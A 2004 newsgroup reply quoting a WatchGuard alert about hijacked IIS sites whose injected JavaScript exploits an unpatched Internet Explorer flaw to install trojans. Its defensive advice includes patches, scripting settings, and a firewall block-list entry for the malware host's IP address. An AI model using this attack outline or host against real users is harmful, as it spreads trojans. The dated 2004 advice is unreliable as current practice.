Re: FYI WatchGuard Security Alert

From: steve h. (steve2470nonsense_at_nonsensemailblocks.com)
Date: 06/27/04 

Date: Sat, 26 Jun 2004 22:25:35 GMT

Duane Arnold wrote:

> Some people may already know this.
>
> Duane :)
>
> <snip>
>
> Hijacked Web Sites Spread
> Trojans to IE Visitors
> Severity: High
> 25 June, 2004
>
> Summary:
>
> Yesterday, NetSec Inc warned of a large-scale attack they detected
> spreading from numerous Web sites (including popular destinations such as
> search engines, online price-comparison sites, auction sites, and
> financial institution sites) to unsuspecting Internet Explorer (IE)
> users. Apparently, hackers have hijacked some IIS Web servers and
> injected the sites' Web pages with malicious JavaScript code. The
> hijacked Web sites exploit an unpatched IE vulnerability, spreading a
> malicious Trojan to any IE user visiting the sites. The malicious Trojan
> can install a keystroke logger, set up a malicious proxy server, or
> install a back door, giving the attacker total control of the victim's
> machine. See the Solution section below to learn how to protect your
> users and your IIS server from this malware.
>
> Exposure:
> Late yesterday, NetSec Inc. warned that they were seeing some sort of
> malware spreading from IIS Web servers of certain public sites. Today, a
> few more details about this attack emerged. Hackers have apparently
> somehow corrupted many Web sites, including some very popular ones, and
> injected malicious JavaScript code into the document footer of all the
> hijacked Web sites' pages.
>
> If any IE user visits one of these infected Web sites, he triggers the
> malicious JavaScript code, which exploits an unpatched IE vulnerability
> (similar to the one described here). This causes the unsuspecting IE user
> to automatically download and install one of many malicious Trojans from
> a Russian site. Which specific Trojan the victim receives differs from
> case to case. Some of the Trojans install keystroke loggers, others
> install proxy servers, and some even backdoor your computer, allowing the
> attacker full access. AV vendors have named some of these Trojans Scob,
> Backdoor-AXJ and VBS/Psyme.
>
> As this issue develops, many details remain unknown, and as a result,
> much of the reporting is contradictory. The problem is complicated by the
> fact that it concerns two vulnerabilities: one in IIS, and one in IE. For
> now, experts still don't know exactly how the hackers gained control over
> the hijacked IIS servers. We still don't know whether the attackers
> manually hijacked each infected IIS server or if the IIS infection is
> spreading automatically via some undiscovered worm or attack bot. The IE
> vulnerability has no patch available, and according to some sources,
> Microsoft is not close to offering one. That means all IE users are at
> risk for the foreseeable future.
>
> Although this attack vector seems new, hackers used a similar attack
> method against a large Web hosting company called Interland in 2003.
>
> Solution Path:
> For IIS Administrators:
>
> Though no one really knows how the hijacked IIS servers first became
> infected by this malware, most experts suspect that the IIS servers were
> attacked using vulnerabilities corrected by Microsoft's MS04-011 security
> patch, described in our April 13 Vulnerability Alert. If you haven't
> already applied this patch, you should do so immediately. Administrators
> who applied this patch without rebooting report that they still remained
> vulnerable to attack, so make sure to reboot your server after applying
> the patch.
>
> Is your own IIS server infected? SANS's write-up on this attack lists
> symptoms to look for. You should verify that your server doesn't show any
> of these symptoms.
>
> For Internet Explorer Users:
>
> The infected Web servers use an unpatched IE exploit to deliver the
> malicious Trojan. All IE users are vulnerable to this attack except the
> few using the Windows XP SP2 Release Candidate 2.
>
> However, you can adjust some of IE's security settings to prevent this
> attack from succeeding. (Before you try any of the steps in this
> paragraph, read it completely, since this workaround may also hamper your
> experience at uninfected Web sites.) This attack uses JavaScript, so have
> all your IE users disable JavaScript in IE. To do so, click Tools =>
> Internet Options => Security tab. Highlight the "Internet" Zone and then
> click Custom Level. Scroll down to Scripting and disable both "Active
> Scripting" and "Scripting of Java Applets." Keep in mind, some legitimate
> sites use Java scripting and Active Scripting in order to work properly.
> For instance, an Outlook Web Access server uses Active Scripting to
> display mail to your users via a browser. If you encounter a legitimate
> site that you must allow your users to access, we recommend you add that
> site to the "Trusted Site" list in IE (also under Tools => Internet
> Options => Security tab). You can learn more about adjusting IE's
> security settings here.
>
> Many AV vendors have added signatures which detect this malicious HTML
> attack and the Trojans it delivers. We recommend you update your AV
> signatures to make sure you can detect and prevent these attacks.
>
> IE users should also make sure they are up-to-date with all IE patches.
> Visiting Windows Update is the easiest way to see if an individual PC is
> up to date.
>
> For WatchGuard Firebox III, X, SOHO, and Vclass Users:
> IIS Attack: Since the IIS infection vector remains unclear, we don't know
> if WatchGuard firewalls help. However, if the attackers use one of the
> vulnerabilities corrected by MS04-011, the attack likely uses one of
> Microsoft's NetBIOS ports (TCP or UDP 135, 137, 138, 139, 445). All
> WatchGuard firewalls block these ports by default.
>
> IE Trojan Download: Unfortunately, the IE flaw that allows a Trojan to
> automatically download to a victim computer looks like normal HTML, so
> you can't block it through your WatchGuard firewalls. However, in order
> to deliver the malicious Trojan, the current exploit code redirects your
> browser to IP address 217.107.218.147. Adding 217.107.218.147 to your
> Firebox Blocked Sites list helps prevent your users from downloading the
> malicious Trojans associated with this attack:
>
> Firebox SOHO. From the SOHO Web UI, click Blocked Sites under Firewall in
> the left hand navigator. Next to Host IP Address, type 217.107.218.147
> and press Add. Scroll to the bottom of the page and hit Submit.
> Firebox III/X. In Policy Manager, go to Setup => Intrusion Prevention =>
> Blocked Sites. Click Add, type 217.107.218.147 and hit OK twice.
> Firebox Vclass. In Vcontroller, click on System Configuration and then
> Blocked Sites. Click Add, type 217.107.218.147 and hit OK.
> Note that hackers this resourceful could change which server delivers the
> Trojans. Though it is wise to block 217.107.218.147, doing so is not
> necessarily a permanent solution to this problem.
>
> <snip>
btw, some of the sites I read specifically recommended using Mozilla,
etc. for a while

Relevant Pages
Quantcast